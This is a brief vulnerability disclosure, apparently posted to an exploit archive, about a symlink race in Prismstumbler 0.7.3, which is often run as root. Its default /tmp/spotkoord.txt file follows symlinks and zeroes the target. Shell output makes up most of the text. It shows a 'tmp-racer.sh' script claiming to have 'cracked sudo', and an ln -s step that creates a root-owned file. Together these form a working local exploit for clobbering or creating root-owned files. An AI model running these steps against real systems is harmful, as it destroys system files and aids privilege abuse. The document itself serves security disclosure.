Prismstumbler version 0.7.3 suffers from a file clobbering vulnerability.
91a9f72de093f58686de2940b9eb49c3717f57f500603245b67bcb8ebb1377cb
I found a symlink vuln in this older program.
Prismstumbler 0.7.3 is most often ran as root to utilize all of capabilities.
Prismstumbler (pst) creates /tmp/.psintercom and /tmp/spotkoord.txt as default. Can be changed within preferences.
srw-rw-rw- 1 root root 0 2009-04-02 00:44 .psintercom
-rw-r--r-- 1 root root 0 2009-04-02 00:44 spotkoord.txt
The /tmp/spotkoord.txt file follows symlinks and zeros out linked file. While /tmp/.psintercom actually checks to see if it is there or not.
#
guy@Tengu:~/Tools$ sh tmp-racer.sh /tmp/spotkoord.txt sudo pst
Attempting to crack sudo...
[sudo] password for root:
Expected pid: 31425
Actual pid: 31425
Exit status: 0
Files /tmp/dir.31416/target and /tmp/dir.31416/original differ
I cracked sudo
#
Creation of root owned files. Or clobbering of root owned files.
guy@Tengu:/tmp$ ls -la rootfile
ls: cannot access rootfile: No such file or directory
guy@Tengu:/tmp$ ln -s rootfile spotkoord.txt
guy@Tengu:/tmp$ sudo pst
Can't connect to localhost.2947: Connection refused
eth1: ERROR while getting interface flags: No such device
Can't open pcap device: Operation not supportedCan't open pcap device: Operation not supportedguy@Tengu:/tmp$
guy@Tengu:/tmp$ ls -la rootfile
-rw-r--r-- 1 root root 0 2009-04-02 01:45 rootfile
guy@Tengu:/tmp$